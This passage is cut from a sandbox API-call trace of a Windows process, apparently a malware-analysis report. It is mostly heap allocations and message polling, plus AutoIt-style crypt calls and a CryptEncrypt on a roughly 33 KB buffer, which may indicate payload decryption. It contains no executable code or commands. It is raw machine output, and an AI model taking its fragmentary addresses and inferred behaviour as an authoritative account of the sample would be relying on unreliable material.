wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0158.488] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.488] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.488] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0158.489] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.489] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.489] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.489] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.489] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0158.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.490] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.491] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x81f0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8200) returned 1 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0158.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0158.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0158.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0158.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0158.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2d0 [0158.497] CharLowerBuffW (in: lpsz="byte[33281]", cchLength=0xb | out: lpsz="byte[33281]") returned 0xb [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0158.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8201) returned 0x9fd778 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df2d0 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | 